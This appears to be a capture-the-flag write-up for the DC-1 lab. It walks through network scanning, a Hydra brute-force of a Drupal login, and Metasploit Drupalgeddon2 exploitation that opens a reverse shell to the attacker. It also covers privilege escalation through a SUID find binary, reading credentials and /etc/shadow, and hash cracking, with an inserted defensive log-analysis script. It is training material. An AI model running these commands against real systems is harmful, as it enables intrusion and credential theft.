The DC-1 challenge is designed to help you practice the skills needed to find weaknesses in a network, take advantage of them, and eventually gain full control over a target machine. In this write-up, I will guide you step by step through the process, explaining everything in simple terms.
It uses tools like Nmap to scan the network, Hydra to guess passwords, and Metasploit to exploit known security flaws. By following these steps, you will learn how to break into a machine running Drupal, a content management system, and eventually gain administrative access.
Objective:
The goal of this challenge is to identify the vulnerabilities in the DC-1 machine, exploit them, and eventually gain root access.
Gaining Initial Access
Switching to the Root User: First, you need to become the root user (the highest-privilege user) on your ATTACKER machine (Kali Linux). This is important because some of the commands below require elevated permissions.
sudo su
Finding the ATTACKER IP: Find the IP address of the ATTACKER machine (Kali Linux). You will need it later, because the TARGET has to connect back to the ATTACKER machine.
ip a
Scanning the Network: Now scan the network to find other devices, such as the TARGET machine (DC-1). This helps you understand which devices are active and what services they are running.
Scanning the network with the appropriate IP range:
netdiscover -r <NETWORK IP>/<CIDR>
Simple Ping Scan: This checks which devices are online without probing them deeply.
A quick scan across the entire network that lists all active devices without probing open ports, used to identify the IP address of the DC-1 machine.
nmap -sn <NETWORK IP>/<CIDR>
Detailed Network Scan: This scan gives detailed information about all devices on the network, including the services that are running and the open port numbers.
Scanning all the IPs in the specified range at once gathers detailed information on all active devices in one go.
nmap -Pn -sSV -A -p- <NETWORK IP>/<CIDR>
-Pn: Disables host discovery and treats all hosts as online.
-sSV: -sS (TCP SYN scan) combined with -sV (service and version detection).
-A: Enables OS detection, version detection, script scanning, and traceroute.
-p-: Scans all 65535 ports.
Summary of Each IP:
— 192.168.19.1
Running Windows with various services like MSRPC, NetBIOS, and possibly AnyDesk.
— 192.168.19.15
Running Linux with OpenSSH and Apache on port 80 (Drupal site).
This looks like DC-1: it has SSH open and an HTTP service running.
— 192.168.19.20
All ports are filtered; it’s hard to gather details, but it could be a firewalled machine.
— 192.168.19.138
Only port 53 is open, and it’s tcpwrapped, indicating some kind of DNS service.
— 192.168.19.12
All ports are filtered, with no additional information.
This is the Kali machine
Since the 192.168.19.15 machine has SSH (port 22) and HTTP (port 80) running, focus on these services first:
Drupal (HTTP Service on Port 80):
Exploiting the Drupal Site (192.168.19.15)
After identifying the TARGET machine (192.168.19.15) as running a Drupal site, you can start trying to exploit it.
Accessing the Drupal Site: Enter the TARGET IP in the web browser.
http://<TARGET IP>
Checking for Exposed Sensitive Default Files
http://<TARGET IP>/CHANGELOG.txt
http://<TARGET IP>/INSTALL.txt
http://<TARGET IP>/README.txt
Trying to Access the Admin Page
http://<TARGET IP>/admin
Trying to access the admin page directly redirects back to the Drupal login page, which shows that admin access is protected.
Brute-Force Attack Using Hydra: To break into the Drupal admin account, use Hydra to try many passwords quickly.
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.19.15 http-post-form "/?q=user/login:username=^USER^&password=^PASS^:Invalid username or password."
This command tries every password in the rockyou.txt wordlist and assumes that "Invalid username or password." is the string displayed when a login attempt fails.
Hydra successfully found multiple valid passwords for the admin user.
The passwords that were identified:
123456
12345678
123456789
rockyou
iloveyou
princess
nicole
password
jessica
abc123
daniel
babygirl
monkey
lovely
Logging into the Drupal site as the admin user with one of the discovered passwords does not work: the account is locked. Drupal temporarily blocks an account after repeated failed logins, and once that happens the login page no longer returns the "Invalid username or password." string, which is why Hydra reported every later guess as a success.
Since the account is locked, exploring other attack vectors on the site.
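From the defender's side, the Hydra run above leaves a very recognisable trace: a burst of POSTs to /?q=user/login from one source. The following is an added example (not part of the write-up) that scans Apache access-log lines for such bursts; the window and threshold are assumed values, and the log lines are constructed sample data.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined-log format; only client IP, timestamp, method and path are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*"'
)
LOGIN_PATH = "/?q=user/login"    # the form Hydra was pointed at
WINDOW = timedelta(seconds=60)   # assumed detection window
THRESHOLD = 5                    # assumed: Drupal 7 blocks an account after 5 failures

def parse_line(line):
    """Return (ip, timestamp, method, path) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"]

def flag_login_bursts(lines, window=WINDOW, threshold=THRESHOLD):
    """Map each source IP to the largest number of login POSTs it made inside
    any `window`-long interval, keeping only sources above `threshold`."""
    stamps_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == LOGIN_PATH:
            stamps_by_ip[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):          # sliding window over sorted times
            while stamps[end] - stamps[start] > window:
                start += 1
            burst = end - start + 1
            if burst > threshold:
                flagged[ip] = max(flagged.get(ip, 0), burst)
    return flagged

def _line(ip, second, method, path, status):
    """Build one constructed Apache log line (sample data, not a real capture)."""
    return (f'{ip} - - [10/Oct/2024:12:00:{second:02d} +0000] '
            f'"{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"')

# Constructed sample: the Kali host hammering the login form, plus one normal visitor.
SAMPLE_LOG = [_line("192.168.19.12", s, "POST", LOGIN_PATH, 200) for s in range(12)]
SAMPLE_LOG += [_line("192.168.19.1", 3, "POST", LOGIN_PATH, 302),
               _line("192.168.19.1", 4, "GET", "/admin", 302)]
```

Running flag_login_bursts(SAMPLE_LOG) reports only 192.168.19.12, with 12 login POSTs inside the window.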
Searching for available exploits related to Drupal using Exploit Database (exploit-db), a public platform for exploits and vulnerability information.
https://www.exploit-db.com/
Post-Exploitation with Metasploit
Exploit a Vulnerability using Metasploit Framework
Metasploit is a powerful and widely-used penetration testing framework that provides security professionals, ethical hackers, and researchers with tools to discover, exploit, and validate vulnerabilities in systems.
Starting Metasploit console
The command-line interface (CLI) of Metasploit, called msfconsole, is the most commonly used interface. It allows users to configure and run exploits, payloads, and auxiliary modules interactively.
msfconsole -q
Searching for Drupal Exploits: Look for exploits related to the Drupal site using its vulnerability identifier (CVE).
search cve:2019-6340
Using Exploit Modules: Select and use the exploit module that targets Drupal's vulnerability.
use exploit/unix/webapp/drupal_restws_unserialize
Showing the options for the module
show options
Required Options:
RHOSTS: the TARGET IP address (the Drupal server).
set RHOSTS <TARGET IP>
LHOST: the ATTACKER machine's IP address, to which the reverse shell connects back.
set LHOST <ATTACKER IP>
Verifying that all needed options are set
show options
Running the Exploit
run
Setting ForceExploit Option:
Setting ForceExploit to true and running again
set ForceExploit true
run
Result: Wasn’t successful.
Searching for a different exploit
search drupal
Selecting the Exploit Module
use exploit/unix/webapp/drupal_drupalgeddon2
RHOSTS
set RHOSTS <TARGET IP>
Verifying that all needed options are set and running the exploit
show options
Running the Exploit
run
Result: Successful. There is now a Meterpreter session, which means there is control over the TARGET machine.
Interacting with the Session
sessions -i 1
Gathering System Information
sysinfo
Checking Current User Privileges
getuid
Escalating Privileges: To get full control, privileges need to be escalated. First, convert the Meterpreter session into a more stable shell:
Converting the Meterpreter Session to Shell
shell
Improving the Shell
python -c 'import pty;pty.spawn("/bin/bash")'
Listing files and directories
ls
Checking Flag Files
cat flag1.txt
Listing the Directories
ls -d */
Navigating to the site Directory
cd sites
Listing the Directories
ls -d */
Navigating into the sites Directory
cd sites/
ls -la
Navigating into the default Directory
cd default
ls
Viewing the Contents of settings.php
cat settings.php
Key Information in settings.php:
Database Credentials:
Database Name: drupaldb
Username: dbuser
Password: R0ck3t
Host: localhost
Drupal Hash Salt: a unique string used for securing one-time login links and form tokens.
Searching for SUID Binaries: SUID (Set Owner User ID) Binaries can sometimes be exploited to gain
find / -perm -4000 -type f 2>/dev/null
This command is used in Linux to find all files on the system that have the SUID (Set User ID) permission set.
find /: This starts the search at the root directory (/) and searches through all directories and subdirectories.
-perm -4000: The -perm option is used to search for files with specific permissions. The -4000 argument tells find to look for files with the SUID bit set. The SUID bit allows a file to be executed with the permissions of the file’s owner rather than the permissions of the user who runs it.
-type f: This restricts the search to only files (-type f) and excludes directories, links, and other types of filesystem objects.
2>/dev/null: This redirects any error messages (e.g., permission denied errors) to /dev/null, effectively silencing them. This is useful when searching through directories where you might not have read permissions.
Using GTFOBins to look up a privilege-escalation method for the find command
GTFOBins (Get The F*ck Out Binaries) is a curated list of Unix binaries that can be exploited by an attacker to escalate privileges, bypass local security restrictions, or break out of restricted environments like containers and chrooted systems.
https://gtfobins.github.io/
Using the find Command to Execute a Shell for the First Found File
find . -exec /bin/sh \; -quit
whoami
id
Logging Into MySQL
MySQL is a widely-used, open-source relational database management system (RDBMS) that uses Structured Query Language (SQL) for accessing, managing, and manipulating databases. MySQL is known for its speed, reliability, and ease of use, making it a popular choice for web applications, data warehousing, and enterprise-level projects.
mysql -u dbuser -p
Selecting the Drupal Database
USE drupaldb;
Listing the Tables in the Database
SHOW TABLES;
Checking the Users Table
DESCRIBE users;
Retrieving Data from the Users Table
SELECT uid, name, pass, mail FROM users;
Cracking Passwords
Saving the Hash to a File
echo '<HASH>' > admin_hash.txt
Cracking using John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt admin_hash.txt
John the Ripper compares the hash against a list of candidate passwords.
The password-cracking process using John the Ripper was successful. The password that was cracked is 53cr3t.
Logging into the Drupal Admin Interface
Username: admin
Password: 53cr3t
Accessing the /etc/shadow file to see the hashed passwords of all users on the system
cat /etc/shadow
In a new terminal on the Kali Linux machine, creating a file with the root hash
echo '<HASH>' > root_hash.txt
Running John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt root_hash.txt
The session ended without any result; John the Ripper was unable to crack the password.
Using Hashcat to Crack the Password
hashcat -m 1800 -a 0 root_hash.txt /usr/share/wordlists/rockyou.txt
-m 1800: Specifies the hash type, which is SHA-512 (crypt).
-a 0: Specifies the attack mode, which is a straight dictionary attack.
root_hash.txt: The file containing the hash you want to crack.
/usr/share/wordlists/rockyou.txt: The wordlist used for the dictionary attack.
The hash was not cracked.
Backgrounding the Meterpreter Session
background
In the Metasploit console, load the local exploit suggester module to look for a way to gain higher privileges
use post/multi/recon/local_exploit_suggester
List of active sessions
sessions
Set the Session ID
set SESSION 1
Running the Exploit
run
No exploits for the current environment were found.
Navigating to the root Directory and Listing the Contents
cd /root
ls
Reading the Contents of thefinalflag.txt
cat thefinalflag.txt
Completing this challenge not only reinforces technical skills but also enhances problem-solving abilities and strategic thinking. A challenge like DC-1 will help you become more proficient in identifying and addressing security threats in real-world scenarios, leading to continuous professional growth in the fascinating world of cybersecurity.